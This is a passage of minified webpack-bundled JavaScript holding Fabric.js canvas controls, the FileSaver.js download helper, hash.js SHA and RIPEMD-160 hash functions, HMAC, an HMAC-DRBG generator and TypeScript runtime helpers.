E=j.controlsUtils,g=E.scaleSkewCursorStyleHandler,b=E.scaleCursorStyleHandler,_=E.scalingEqually,y=E.scalingYOrSkewingX,M=E.scalingXOrSkewingY,p=E.scaleOrSkewActionName,D=j.Object.prototype.controls;if(D.ml=new j.Control({x:-.5,y:0,cursorStyleHandler:g,actionHandler:M,getActionName:p}),D.mr=new j.Control({x:.5,y:0,cursorStyleHandler:g,actionHandler:M,getActionName:p}),D.mb=new j.Control({x:0,y:.5,cursorStyleHandler:g,actionHandler:y,getActionName:p}),D.mt=new j.Control({x:0,y:-.5,cursorStyleHandler:g,actionHandler:y,getActionName:p}),D.tl=new j.Control({x:-.5,y:-.5,cursorStyleHandler:b,actionHandler:_}),D.tr=new j.Control({x:.5,y:-.5,cursorStyleHandler:b,actionHandler:_}),D.bl=new j.Control({x:-.5,y:.5,cursorStyleHandler:b,actionHandler:_}),D.br=new j.Control({x:.5,y:.5,cursorStyleHandler:b,actionHandler:_}),D.mtr=new j.Control({x:0,y:-.5,actionHandler:E.rotationWithSnapping,cursorStyleHandler:E.rotationStyleHandler,offsetY:-40,withConnection:!0,actionName:"rotate"}),j.Textbox){var w=j.Textbox.prototype.controls={};w.mtr=D.mtr,w.tr=D.tr,w.br=D.br,w.tl=D.tl,w.bl=D.bl,w.mt=D.mt,w.mb=D.mb,w.mr=new j.Control({x:.5,y:0,actionHandler:E.changeWidth,cursorStyleHandler:g,actionName:"resizing"}),w.ml=new j.Control({x:-.5,y:0,actionHandler:E.changeWidth,cursorStyleHandler:g,actionName:"resizing"})}}()},2344:function(Pe,we){var j;void 0!==(j=function(){"use strict";function ae(b,_,y){var M=new XMLHttpRequest;M.open("GET",b),M.responseType="blob",M.onload=function(){g(M.response,_,y)},M.onerror=function(){console.error("could not download file")},M.send()}function I(b){var _=new XMLHttpRequest;_.open("HEAD",b,!1);try{_.send()}catch(y){}return 200<=_.status&&299>=_.status}function Q(b){try{b.dispatchEvent(new MouseEvent("click"))}catch(y){var _=document.createEvent("MouseEvents");_.initMouseEvent("click",!0,!0,window,0,0,0,80,20,!1,!1,!1,!1,0,null),b.dispatchEvent(_)}}var F="object"==typeof window&&window.window===window?window:"object"==typeof self&&self.self===self?self:"object"==typeof global&&global.global===global?global:void 0,E=F.navigator&&/Macintosh/.test(navigator.userAgent)&&/AppleWebKit/.test(navigator.userAgent)&&!/Safari/.test(navigator.userAgent),g=F.saveAs||("object"!=typeof window||window!==F?function(){}:"download"in HTMLAnchorElement.prototype&&!E?function(b,_,y){var M=F.URL||F.webkitURL,p=document.createElement("a");p.download=_=_||b.name||"download",p.rel="noopener","string"==typeof b?(p.href=b,p.origin===location.origin?Q(p):I(p.href)?ae(b,_,y):Q(p,p.target="_blank")):(p.href=M.createObjectURL(b),setTimeout(function(){M.revokeObjectURL(p.href)},4e4),setTimeout(function(){Q(p)},0))}:"msSaveOrOpenBlob"in navigator?function(b,_,y){if(_=_||b.name||"download","string"!=typeof b)navigator.msSaveOrOpenBlob(function $(b,_){return void 0===_?_={autoBom:!1}:"object"!=typeof _&&(console.warn("Deprecated: Expected third argument to be a object"),_={autoBom:!_}),_.autoBom&&/^\s*(?:text\/\S*|application\/xml|\S*\/\S*\+xml)\s*;.*charset\s*=\s*utf-8/i.test(b.type)?new Blob(["\ufeff",b],{type:b.type}):b}(b,y),_);else if(I(b))ae(b,_,y);else{var M=document.createElement("a");M.href=b,M.target="_blank",setTimeout(function(){Q(M)})}}:function(b,_,y,M){if((M=M||open("","_blank"))&&(M.document.title=M.document.body.innerText="downloading..."),"string"==typeof b)return ae(b,_,y);var p="application/octet-stream"===b.type,D=/constructor/i.test(F.HTMLElement)||F.safari,w=/CriOS\/[\d]+/.test(navigator.userAgent);if((w||p&&D||E)&&"undefined"!=typeof FileReader){var x=new FileReader;x.onloadend=function(){var U=x.result;U=w?U:U.replace(/^data:[^;]*;/,"data:attachment/file;"),M?M.location.href=U:location=U,M=null},x.readAsDataURL(b)}else{var S=F.URL||F.webkitURL,O=S.createObjectURL(b);M?M.location=O:location.href=O,M=null,setTimeout(function(){S.revokeObjectURL(O)},4e4)}});F.saveAs=g.saveAs=g,Pe.exports=g}.apply(we,[]))&&(Pe.exports=j)},5110:(Pe,we,de)=>{"use strict";var ie=de(265).Buffer,j=de(4539).Transform;function I(Q){j.call(this),this._block=ie.allocUnsafe(Q),this._blockSize=Q,this._blockOffset=0,this._length=[0,0,0,0],this._finalized=!1}de(2270)(I,j),I.prototype._transform=function(Q,F,E){var g=null;try{this.update(Q,F)}catch(b){g=b}E(g)},I.prototype._flush=function(Q){var F=null;try{this.push(this.digest())}catch(E){F=E}Q(F)},I.prototype.update=function(Q,F){if(function ae(Q,F){if(!ie.isBuffer(Q)&&"string"!=typeof Q)throw new TypeError(F+" must be a string or a buffer")}(Q,"Data"),this._finalized)throw new Error("Digest already called");ie.isBuffer(Q)||(Q=ie.from(Q,F));for(var E=this._block,g=0;this._blockOffset+Q.length-g>=this._blockSize;){for(var b=this._blockOffset;b<this._blockSize;)E[b++]=Q[g++];this._update(),this._blockOffset=0}for(;g<Q.length;)E[this._blockOffset++]=Q[g++];for(var _=0,y=8*Q.length;y>0;++_)this._length[_]+=y,(y=this._length[_]/4294967296|0)>0&&(this._length[_]-=4294967296*y);return this},I.prototype._update=function(){throw new Error("_update is not implemented")},I.prototype.digest=function(Q){if(this._finalized)throw new Error("Digest already called");this._finalized=!0;var F=this._digest();void 0!==Q&&(F=F.toString(Q)),this._block.fill(0),this._blockOffset=0;for(var E=0;E<4;++E)this._length[E]=0;return F},I.prototype._digest=function(){throw new Error("_digest is not implemented")},Pe.exports=I},8414:(Pe,we,de)=>{var ie=we;ie.utils=de(6378),ie.common=de(7774),ie.sha=de(7452),ie.ripemd=de(7699),ie.hmac=de(5351),ie.sha1=ie.sha.sha1,ie.sha256=ie.sha.sha256,ie.sha224=ie.sha.sha224,ie.sha384=ie.sha.sha384,ie.sha512=ie.sha.sha512,ie.ripemd160=ie.ripemd.ripemd160},7774:(Pe,we,de)=>{"use strict";var ie=de(6378),j=de(490);function $(){this.pending=null,this.pendingTotal=0,this.blockSize=this.constructor.blockSize,this.outSize=this.constructor.outSize,this.hmacStrength=this.constructor.hmacStrength,this.padLength=this.constructor.padLength/8,this.endian="big",this._delta8=this.blockSize/8,this._delta32=this.blockSize/32}we.BlockHash=$,$.prototype.update=function(I,Q){if(I=ie.toArray(I,Q),this.pending=this.pending?this.pending.concat(I):I,this.pendingTotal+=I.length,this.pending.length>=this._delta8){var F=(I=this.pending).length%this._delta8;this.pending=I.slice(I.length-F,I.length),0===this.pending.length&&(this.pending=null),I=ie.join32(I,0,I.length-F,this.endian);for(var E=0;E<I.length;E+=this._delta32)this._update(I,E,E+this._delta32)}return this},$.prototype.digest=function(I){return this.update(this._pad()),j(null===this.pending),this._digest(I)},$.prototype._pad=function(){var I=this.pendingTotal,Q=this._delta8,F=Q-(I+this.padLength)%Q,E=new Array(F+this.padLength);E[0]=128;for(var g=1;g<F;g++)E[g]=0;if(I<<=3,"big"===this.endian){for(var b=8;b<this.padLength;b++)E[g++]=0;E[g++]=0,E[g++]=0,E[g++]=0,E[g++]=0,E[g++]=I>>>24&255,E[g++]=I>>>16&255,E[g++]=I>>>8&255,E[g++]=255&I}else for(E[g++]=255&I,E[g++]=I>>>8&255,E[g++]=I>>>16&255,E[g++]=I>>>24&255,E[g++]=0,E[g++]=0,E[g++]=0,E[g++]=0,b=8;b<this.padLength;b++)E[g++]=0;return E}},5351:(Pe,we,de)=>{"use strict";var ie=de(6378),j=de(490);function $(ae,I,Q){if(!(this instanceof $))return new $(ae,I,Q);this.Hash=ae,this.blockSize=ae.blockSize/8,this.outSize=ae.outSize/8,this.inner=null,this.outer=null,this._init(ie.toArray(I,Q))}Pe.exports=$,$.prototype._init=function(I){I.length>this.blockSize&&(I=(new this.Hash).update(I).digest()),j(I.length<=this.blockSize);for(var Q=I.length;Q<this.blockSize;Q++)I.push(0);for(Q=0;Q<I.length;Q++)I[Q]^=54;for(this.inner=(new this.Hash).update(I),Q=0;Q<I.length;Q++)I[Q]^=106;this.outer=(new this.Hash).update(I)},$.prototype.update=function(I,Q){return this.inner.update(I,Q),this},$.prototype.digest=function(I){return this.outer.update(this.inner.digest()),this.outer.digest(I)}},7699:(Pe,we,de)=>{"use strict";var ie=de(6378),j=de(7774),$=ie.rotl32,ae=ie.sum32,I=ie.sum32_3,Q=ie.sum32_4,F=j.BlockHash;function E(){if(!(this instanceof E))return new E;F.call(this),this.h=[1732584193,4023233417,2562383102,271733878,3285377520],this.endian="little"}function g(w,x,S,O){return w<=15?x^S^O:w<=31?x&S|~x&O:w<=47?(x|~S)^O:w<=63?x&O|S&~O:x^(S|~O)}function _(w){return w<=15?1352829926:w<=31?1548603684:w<=47?1836072691:w<=63?2053994217:0}ie.inherits(E,F),we.ripemd160=E,E.blockSize=512,E.outSize=160,E.hmacStrength=192,E.padLength=64,E.prototype._update=function(x,S){for(var O=this.h[0],U=this.h[1],K=this.h[2],ee=this.h[3],se=this.h[4],ve=O,le=U,ye=K,z=ee,l=se,f=0;f<80;f++){var A=ae($(Q(O,g(f,U,K,ee),x[y[f]+S],(w=f)<=15?0:w<=31?1518500249:w<=47?1859775393:w<=63?2400959708:2840853838),p[f]),se);O=se,se=ee,ee=$(K,10),K=U,U=A,A=ae($(Q(ve,g(79-f,le,ye,z),x[M[f]+S],_(f)),D[f]),l),ve=l,l=z,z=$(ye,10),ye=le,le=A}var w;A=I(this.h[1],K,z),this.h[1]=I(this.h[2],ee,l),this.h[2]=I(this.h[3],se,ve),this.h[3]=I(this.h[4],O,le),this.h[4]=I(this.h[0],U,ye),this.h[0]=A},E.prototype._digest=function(x){return"hex"===x?ie.toHex32(this.h,"little"):ie.split32(this.h,"little")};var y=[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,7,4,13,1,10,6,15,3,12,0,9,5,2,14,11,8,3,10,14,4,9,15,8,1,2,7,0,6,13,11,5,12,1,9,11,10,0,8,12,4,13,3,7,15,14,5,6,2,4,0,5,9,7,12,2,10,14,1,3,8,11,6,15,13],M=[5,14,7,0,9,2,11,4,13,6,15,8,1,10,3,12,6,11,3,7,0,13,5,10,14,15,8,12,4,9,1,2,15,5,1,3,7,14,6,9,11,8,12,2,10,0,4,13,8,6,4,1,3,11,15,0,5,12,2,13,9,7,10,14,12,15,10,4,1,5,8,7,6,2,13,14,0,3,9,11],p=[11,14,15,12,5,8,7,9,11,13,14,15,6,7,9,8,7,6,8,13,11,9,7,15,7,12,15,9,11,7,13,12,11,13,6,7,14,9,13,15,14,8,13,6,5,12,7,5,11,12,14,15,14,15,9,8,9,14,5,6,8,6,5,12,9,15,5,11,6,8,13,12,5,12,13,14,11,8,5,6],D=[8,9,9,11,13,15,15,5,7,7,8,11,14,14,12,6,9,13,15,7,12,8,9,11,7,7,12,7,6,15,13,11,9,7,15,11,8,6,6,14,12,13,5,14,13,13,7,5,15,5,8,11,14,14,6,14,6,9,12,9,12,5,15,8,8,5,12,9,12,5,14,6,8,13,6,5,15,13,11,11]},7452:(Pe,we,de)=>{"use strict";we.sha1=de(1721),we.sha224=de(3455),we.sha256=de(7756),we.sha384=de(925),we.sha512=de(617)},1721:(Pe,we,de)=>{"use strict";var ie=de(6378),j=de(7774),$=de(9524),ae=ie.rotl32,I=ie.sum32,Q=ie.sum32_5,F=$.ft_1,E=j.BlockHash,g=[1518500249,1859775393,2400959708,3395469782];function b(){if(!(this instanceof b))return new b;E.call(this),this.h=[1732584193,4023233417,2562383102,271733878,3285377520],this.W=new Array(80)}ie.inherits(b,E),Pe.exports=b,b.blockSize=512,b.outSize=160,b.hmacStrength=80,b.padLength=64,b.prototype._update=function(y,M){for(var p=this.W,D=0;D<16;D++)p[D]=y[M+D];for(;D<p.length;D++)p[D]=ae(p[D-3]^p[D-8]^p[D-14]^p[D-16],1);var w=this.h[0],x=this.h[1],S=this.h[2],O=this.h[3],U=this.h[4];for(D=0;D<p.length;D++){var K=~~(D/20),ee=Q(ae(w,5),F(K,x,S,O),U,p[D],g[K]);U=O,O=S,S=ae(x,30),x=w,w=ee}this.h[0]=I(this.h[0],w),this.h[1]=I(this.h[1],x),this.h[2]=I(this.h[2],S),this.h[3]=I(this.h[3],O),this.h[4]=I(this.h[4],U)},b.prototype._digest=function(y){return"hex"===y?ie.toHex32(this.h,"big"):ie.split32(this.h,"big")}},3455:(Pe,we,de)=>{"use strict";var ie=de(6378),j=de(7756);function $(){if(!(this instanceof $))return new $;j.call(this),this.h=[3238371032,914150663,812702999,4144912697,4290775857,1750603025,1694076839,3204075428]}ie.inherits($,j),Pe.exports=$,$.blockSize=512,$.outSize=224,$.hmacStrength=192,$.padLength=64,$.prototype._digest=function(I){return"hex"===I?ie.toHex32(this.h.slice(0,7),"big"):ie.split32(this.h.slice(0,7),"big")}},7756:(Pe,we,de)=>{"use strict";var ie=de(6378),j=de(7774),$=de(9524),ae=de(490),I=ie.sum32,Q=ie.sum32_4,F=ie.sum32_5,E=$.ch32,g=$.maj32,b=$.s0_256,_=$.s1_256,y=$.g0_256,M=$.g1_256,p=j.BlockHash,D=[1116352408,1899447441,3049323471,3921009573,961987163,1508970993,2453635748,2870763221,3624381080,310598401,607225278,1426881987,1925078388,2162078206,2614888103,3248222580,3835390401,4022224774,264347078,604807628,770255983,1249150122,1555081692,1996064986,2554220882,2821834349,2952996808,3210313671,3336571891,3584528711,113926993,338241895,666307205,773529912,1294757372,1396182291,1695183700,1986661051,2177026350,2456956037,2730485921,2820302411,3259730800,3345764771,3516065817,3600352804,4094571909,275423344,430227734,506948616,659060556,883997877,958139571,1322822218,1537002063,1747873779,1955562222,2024104815,2227730452,2361852424,2428436474,2756734187,3204031479,3329325298];function w(){if(!(this instanceof w))return new w;p.call(this),this.h=[1779033703,3144134277,1013904242,2773480762,1359893119,2600822924,528734635,1541459225],this.k=D,this.W=new Array(64)}ie.inherits(w,p),Pe.exports=w,w.blockSize=512,w.outSize=256,w.hmacStrength=192,w.padLength=64,w.prototype._update=function(S,O){for(var U=this.W,K=0;K<16;K++)U[K]=S[O+K];for(;K<U.length;K++)U[K]=Q(M(U[K-2]),U[K-7],y(U[K-15]),U[K-16]);var ee=this.h[0],se=this.h[1],ve=this.h[2],le=this.h[3],ye=this.h[4],z=this.h[5],l=this.h[6],f=this.h[7];for(ae(this.k.length===U.length),K=0;K<U.length;K++){var A=F(f,_(ye),E(ye,z,l),this.k[K],U[K]),v=I(b(ee),g(ee,se,ve));f=l,l=z,z=ye,ye=I(le,A),le=ve,ve=se,se=ee,ee=I(A,v)}this.h[0]=I(this.h[0],ee),this.h[1]=I(this.h[1],se),this.h[2]=I(this.h[2],ve),this.h[3]=I(this.h[3],le),this.h[4]=I(this.h[4],ye),this.h[5]=I(this.h[5],z),this.h[6]=I(this.h[6],l),this.h[7]=I(this.h[7],f)},w.prototype._digest=function(S){return"hex"===S?ie.toHex32(this.h,"big"):ie.split32(this.h,"big")}},925:(Pe,we,de)=>{"use strict";var ie=de(6378),j=de(617);function $(){if(!(this instanceof $))return new $;j.call(this),this.h=[3418070365,3238371032,1654270250,914150663,2438529370,812702999,355462360,4144912697,1731405415,4290775857,2394180231,1750603025,3675008525,1694076839,1203062813,3204075428]}ie.inherits($,j),Pe.exports=$,$.blockSize=1024,$.outSize=384,$.hmacStrength=192,$.padLength=128,$.prototype._digest=function(I){return"hex"===I?ie.toHex32(this.h.slice(0,12),"big"):ie.split32(this.h.slice(0,12),"big")}},617:(Pe,we,de)=>{"use strict";var ie=de(6378),j=de(7774),$=de(490),ae=ie.rotr64_hi,I=ie.rotr64_lo,Q=ie.shr64_hi,F=ie.shr64_lo,E=ie.sum64,g=ie.sum64_hi,b=ie.sum64_lo,_=ie.sum64_4_hi,y=ie.sum64_4_lo,M=ie.sum64_5_hi,p=ie.sum64_5_lo,D=j.BlockHash,w=[1116352408,3609767458,1899447441,602891725,3049323471,3964484399,3921009573,2173295548,961987163,4081628472,1508970993,3053834265,2453635748,2937671579,2870763221,3664609560,3624381080,2734883394,310598401,1164996542,607225278,1323610764,1426881987,3590304994,1925078388,4068182383,2162078206,991336113,2614888103,633803317,3248222580,3479774868,3835390401,2666613458,4022224774,944711139,264347078,2341262773,604807628,2007800933,770255983,1495990901,1249150122,1856431235,1555081692,3175218132,1996064986,2198950837,2554220882,3999719339,2821834349,766784016,2952996808,2566594879,3210313671,3203337956,3336571891,1034457026,3584528711,2466948901,113926993,3758326383,338241895,168717936,666307205,1188179964,773529912,1546045734,1294757372,1522805485,1396182291,2643833823,1695183700,2343527390,1986661051,1014477480,2177026350,1206759142,2456956037,344077627,2730485921,1290863460,2820302411,3158454273,3259730800,3505952657,3345764771,106217008,3516065817,3606008344,3600352804,1432725776,4094571909,1467031594,275423344,851169720,430227734,3100823752,506948616,1363258195,659060556,3750685593,883997877,3785050280,958139571,3318307427,1322822218,3812723403,1537002063,2003034995,1747873779,3602036899,1955562222,1575990012,2024104815,1125592928,2227730452,2716904306,2361852424,442776044,2428436474,593698344,2756734187,3733110249,3204031479,2999351573,3329325298,3815920427,3391569614,3928383900,3515267271,566280711,3940187606,3454069534,4118630271,4000239992,116418474,1914138554,174292421,2731055270,289380356,3203993006,460393269,320620315,685471733,587496836,852142971,1086792851,1017036298,365543100,1126000580,2618297676,1288033470,3409855158,1501505948,4234509866,1607167915,987167468,1816402316,1246189591];function x(){if(!(this instanceof x))return new x;D.call(this),this.h=[1779033703,4089235720,3144134277,2227873595,1013904242,4271175723,2773480762,1595750129,1359893119,2917565137,2600822924,725511199,528734635,4215389547,1541459225,327033209],this.k=w,this.W=new Array(160)}function S(A,v,P,G,X){var L=A&P^~A&X;return L<0&&(L+=4294967296),L}function O(A,v,P,G,X,L){var h=v&G^~v&L;return h<0&&(h+=4294967296),h}function U(A,v,P,G,X){var L=A&P^A&X^P&X;return L<0&&(L+=4294967296),L}function K(A,v,P,G,X,L){var h=v&G^v&L^G&L;return h<0&&(h+=4294967296),h}function ee(A,v){var L=ae(A,v,28)^ae(v,A,2)^ae(v,A,7);return L<0&&(L+=4294967296),L}function se(A,v){var L=I(A,v,28)^I(v,A,2)^I(v,A,7);return L<0&&(L+=4294967296),L}function ve(A,v){var L=ae(A,v,14)^ae(A,v,18)^ae(v,A,9);return L<0&&(L+=4294967296),L}function le(A,v){var L=I(A,v,14)^I(A,v,18)^I(v,A,9);return L<0&&(L+=4294967296),L}function ye(A,v){var L=ae(A,v,1)^ae(A,v,8)^Q(A,v,7);return L<0&&(L+=4294967296),L}function z(A,v){var L=I(A,v,1)^I(A,v,8)^F(A,v,7);return L<0&&(L+=4294967296),L}function l(A,v){var L=ae(A,v,19)^ae(v,A,29)^Q(A,v,6);return L<0&&(L+=4294967296),L}function f(A,v){var L=I(A,v,19)^I(v,A,29)^F(A,v,6);return L<0&&(L+=4294967296),L}ie.inherits(x,D),Pe.exports=x,x.blockSize=1024,x.outSize=512,x.hmacStrength=192,x.padLength=128,x.prototype._prepareBlock=function(v,P){for(var G=this.W,X=0;X<32;X++)G[X]=v[P+X];for(;X<G.length;X+=2){var L=l(G[X-4],G[X-3]),h=f(G[X-4],G[X-3]),R=G[X-14],J=G[X-13],Z=ye(G[X-30],G[X-29]),ue=z(G[X-30],G[X-29]),Ie=G[X-32],Ae=G[X-31];G[X]=_(L,h,R,J,Z,ue,Ie,Ae),G[X+1]=y(L,h,R,J,Z,ue,Ie,Ae)}},x.prototype._update=function(v,P){this._prepareBlock(v,P);var G=this.W,X=this.h[0],L=this.h[1],h=this.h[2],R=this.h[3],J=this.h[4],Z=this.h[5],ue=this.h[6],Ie=this.h[7],Ae=this.h[8],Ue=this.h[9],Xe=this.h[10],He=this.h[11],Be=this.h[12],qe=this.h[13],De=this.h[14],Ve=this.h[15];$(this.k.length===G.length);for(var ze=0;ze<G.length;ze+=2){var me=De,Ke=Ve,rt=ve(Ae,Ue),Ge=le(Ae,Ue),Qe=S(Ae,0,Xe,0,Be),ht=O(0,Ue,0,He,0,qe),mt=this.k[ze],lt=this.k[ze+1],ft=G[ze],xe=G[ze+1],We=M(me,Ke,rt,Ge,Qe,ht,mt,lt,ft,xe),Je=p(me,Ke,rt,Ge,Qe,ht,mt,lt,ft,xe);me=ee(X,L),Ke=se(X,L),rt=U(X,0,h,0,J),Ge=K(0,L,0,R,0,Z);var Oe=g(me,Ke,rt,Ge),Te=b(me,Ke,rt,Ge);De=Be,Ve=qe,Be=Xe,qe=He,Xe=Ae,He=Ue,Ae=g(ue,Ie,We,Je),Ue=b(Ie,Ie,We,Je),ue=J,Ie=Z,J=h,Z=R,h=X,R=L,X=g(We,Je,Oe,Te),L=b(We,Je,Oe,Te)}E(this.h,0,X,L),E(this.h,2,h,R),E(this.h,4,J,Z),E(this.h,6,ue,Ie),E(this.h,8,Ae,Ue),E(this.h,10,Xe,He),E(this.h,12,Be,qe),E(this.h,14,De,Ve)},x.prototype._digest=function(v){return"hex"===v?ie.toHex32(this.h,"big"):ie.split32(this.h,"big")}},9524:(Pe,we,de)=>{"use strict";var j=de(6378).rotr32;function ae(_,y,M){return _&y^~_&M}function I(_,y,M){return _&y^_&M^y&M}function Q(_,y,M){return _^y^M}we.ft_1=function $(_,y,M,p){return 0===_?ae(y,M,p):1===_||3===_?Q(y,M,p):2===_?I(y,M,p):void 0},we.ch32=ae,we.maj32=I,we.p32=Q,we.s0_256=function F(_){return j(_,2)^j(_,13)^j(_,22)},we.s1_256=function E(_){return j(_,6)^j(_,11)^j(_,25)},we.g0_256=function g(_){return j(_,7)^j(_,18)^_>>>3},we.g1_256=function b(_){return j(_,17)^j(_,19)^_>>>10}},6378:(Pe,we,de)=>{"use strict";var ie=de(490),j=de(2270);function $(f,A){return!(55296!=(64512&f.charCodeAt(A))||A<0||A+1>=f.length)&&56320==(64512&f.charCodeAt(A+1))}function Q(f){return(f>>>24|f>>>8&65280|f<<8&16711680|(255&f)<<24)>>>0}function E(f){return 1===f.length?"0"+f:f}function g(f){return 7===f.length?"0"+f:6===f.length?"00"+f:5===f.length?"000"+f:4===f.length?"0000"+f:3===f.length?"00000"+f:2===f.length?"000000"+f:1===f.length?"0000000"+f:f}we.inherits=j,we.toArray=function ae(f,A){if(Array.isArray(f))return f.slice();if(!f)return[];var v=[];if("string"==typeof f)if(A){if("hex"===A)for((f=f.replace(/[^a-z0-9]+/gi,"")).length%2!=0&&(f="0"+f),G=0;G<f.length;G+=2)v.push(parseInt(f[G]+f[G+1],16))}else for(var P=0,G=0;G<f.length;G++){var X=f.charCodeAt(G);X<128?v[P++]=X:X<2048?(v[P++]=X>>6|192,v[P++]=63&X|128):$(f,G)?(X=65536+((1023&X)<<10)+(1023&f.charCodeAt(++G)),v[P++]=X>>18|240,v[P++]=X>>12&63|128,v[P++]=X>>6&63|128,v[P++]=63&X|128):(v[P++]=X>>12|224,v[P++]=X>>6&63|128,v[P++]=63&X|128)}else for(G=0;G<f.length;G++)v[G]=0|f[G];return v},we.toHex=function I(f){for(var A="",v=0;v<f.length;v++)A+=E(f[v].toString(16));return A},we.htonl=Q,we.toHex32=function F(f,A){for(var v="",P=0;P<f.length;P++){var G=f[P];"little"===A&&(G=Q(G)),v+=g(G.toString(16))}return v},we.zero2=E,we.zero8=g,we.join32=function b(f,A,v,P){var G=v-A;ie(G%4==0);for(var X=new Array(G/4),L=0,h=A;L<X.length;L++,h+=4)X[L]=("big"===P?f[h]<<24|f[h+1]<<16|f[h+2]<<8|f[h+3]:f[h+3]<<24|f[h+2]<<16|f[h+1]<<8|f[h])>>>0;return X},we.split32=function _(f,A){for(var v=new Array(4*f.length),P=0,G=0;P<f.length;P++,G+=4){var X=f[P];"big"===A?(v[G]=X>>>24,v[G+1]=X>>>16&255,v[G+2]=X>>>8&255,v[G+3]=255&X):(v[G+3]=X>>>24,v[G+2]=X>>>16&255,v[G+1]=X>>>8&255,v[G]=255&X)}return v},we.rotr32=function y(f,A){return f>>>A|f<<32-A},we.rotl32=function M(f,A){return f<<A|f>>>32-A},we.sum32=function p(f,A){return f+A>>>0},we.sum32_3=function D(f,A,v){return f+A+v>>>0},we.sum32_4=function w(f,A,v,P){return f+A+v+P>>>0},we.sum32_5=function x(f,A,v,P,G){return f+A+v+P+G>>>0},we.sum64=function S(f,A,v,P){var L=P+f[A+1]>>>0;f[A]=(L<P?1:0)+v+f[A]>>>0,f[A+1]=L},we.sum64_hi=function O(f,A,v,P){return(A+P>>>0<A?1:0)+f+v>>>0},we.sum64_lo=function U(f,A,v,P){return A+P>>>0},we.sum64_4_hi=function K(f,A,v,P,G,X,L,h){var R=0,J=A;return R+=(J=J+P>>>0)<A?1:0,R+=(J=J+X>>>0)<X?1:0,f+v+G+L+(R+=(J=J+h>>>0)<h?1:0)>>>0},we.sum64_4_lo=function ee(f,A,v,P,G,X,L,h){return A+P+X+h>>>0},we.sum64_5_hi=function se(f,A,v,P,G,X,L,h,R,J){var Z=0,ue=A;return Z+=(ue=ue+P>>>0)<A?1:0,Z+=(ue=ue+X>>>0)<X?1:0,Z+=(ue=ue+h>>>0)<h?1:0,f+v+G+L+R+(Z+=(ue=ue+J>>>0)<J?1:0)>>>0},we.sum64_5_lo=function ve(f,A,v,P,G,X,L,h,R,J){return A+P+X+h+J>>>0},we.rotr64_hi=function le(f,A,v){return(A<<32-v|f>>>v)>>>0},we.rotr64_lo=function ye(f,A,v){return(f<<32-v|A>>>v)>>>0},we.shr64_hi=function z(f,A,v){return f>>>v},we.shr64_lo=function l(f,A,v){return(f<<32-v|A>>>v)>>>0}},8116:(Pe,we,de)=>{"use strict";var ie=de(8414),j=de(4108),$=de(490);function ae(I){if(!(this instanceof ae))return new ae(I);this.hash=I.hash,this.predResist=!!I.predResist,this.outLen=this.hash.outSize,this.minEntropy=I.minEntropy||this.hash.hmacStrength,this._reseed=null,this.reseedInterval=null,this.K=null,this.V=null;var Q=j.toArray(I.entropy,I.entropyEnc||"hex"),F=j.toArray(I.nonce,I.nonceEnc||"hex"),E=j.toArray(I.pers,I.persEnc||"hex");$(Q.length>=this.minEntropy/8,"Not enough entropy. Minimum is: "+this.minEntropy+" bits"),this._init(Q,F,E)}Pe.exports=ae,ae.prototype._init=function(Q,F,E){var g=Q.concat(F).concat(E);this.K=new Array(this.outLen/8),this.V=new Array(this.outLen/8);for(var b=0;b<this.V.length;b++)this.K[b]=0,this.V[b]=1;this._update(g),this._reseed=1,this.reseedInterval=281474976710656},ae.prototype._hmac=function(){return new ie.hmac(this.hash,this.K)},ae.prototype._update=function(Q){var F=this._hmac().update(this.V).update([0]);Q&&(F=F.update(Q)),this.K=F.digest(),this.V=this._hmac().update(this.V).digest(),Q&&(this.K=this._hmac().update(this.V).update([1]).update(Q).digest(),this.V=this._hmac().update(this.V).digest())},ae.prototype.reseed=function(Q,F,E,g){"string"!=typeof F&&(g=E,E=F,F=null),Q=j.toArray(Q,F),E=j.toArray(E,g),$(Q.length>=this.minEntropy/8,"Not enough entropy. Minimum is: "+this.minEntropy+" bits"),this._update(Q.concat(E||[])),this._reseed=1},ae.prototype.generate=function(Q,F,E,g){if(this._reseed>this.reseedInterval)throw new Error("Reseed is required");"string"!=typeof F&&(g=E,E=F,F=null),E&&(E=j.toArray(E,g||"hex"),this._update(E));for(var b=[];b.length<Q;)this.V=this._hmac().update(this.V).digest(),b=b.concat(this.V);var _=b.slice(0,Q);return this._update(E),this._reseed++,j.encode(_,F)}},5818:function(Pe){Pe.exports=function(){"use strict";var we=function(fe,ce){return(we=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(ge,_e){ge.__proto__=_e}||function(ge,_e){for(var je in _e)Object.prototype.hasOwnProperty.call(_e,je)&&(ge[je]=_e[je])})(fe,ce)};function de(fe,ce){if("function"!=typeof ce&&null!==ce)throw new TypeError("Class extends value "+String(ce)+" is not a constructor or null");function ge(){this.constructor=fe}we(fe,ce),fe.prototype=null===ce?Object.create(ce):(ge.prototype=ce.prototype,new ge)}var ie=function(){return ie=Object.assign||function(ce){for(var ge,_e=1,je=arguments.length;_e<je;_e++)for(var tt in ge=arguments[_e])Object.prototype.hasOwnProperty.call(ge,tt)&&(ce[tt]=ge[tt]);return ce},ie.apply(this,arguments)};function j(fe,ce,ge,_e){return new(ge||(ge=Promise))(function(tt,dt){function _t(Lt){try{kt(_e.next(Lt))}catch(Ht){dt(Ht)}}function gt(Lt){try{kt(_e.throw(Lt))}catch(Ht){dt(Ht)}}function kt(Lt){Lt.done?tt(Lt.value):function je(tt){return tt instanceof ge?tt:new ge(function(dt){dt(tt)})}(Lt.value).then(_t,gt)}kt((_e=_e.apply(fe,ce||[])).next())})}function $(fe,ce){var _e,je,tt,dt,ge={label:0,sent:function(){if(1&tt[0])throw tt[1];return tt[1]},trys:[],ops:[]};return dt={next:_t(0),throw:_t(1),return:_t(2)},"function"==typeof Symbol&&(dt[Symbol.iterator]=function(){return this}),dt;function _t(kt){return function(Lt){return function gt(kt){if(_e)throw new TypeError("Generator is already executing.");for(;ge;)try{if(_e=1,je&&(tt=2&kt[0]?je.return:kt[0]?je.throw||((tt=je.return)&&tt.call(je),0):je.next)&&!(tt=tt.call(je,kt[1])).done)return tt;switch(je=0,tt&&(kt=[2&kt[0],tt.value]),kt[0]){case 0:case 1:tt=kt;break;case 4:return ge.label++,{value:kt[1],done:!1};case 5:ge.label++,je=kt[1],kt=[0];continue;case 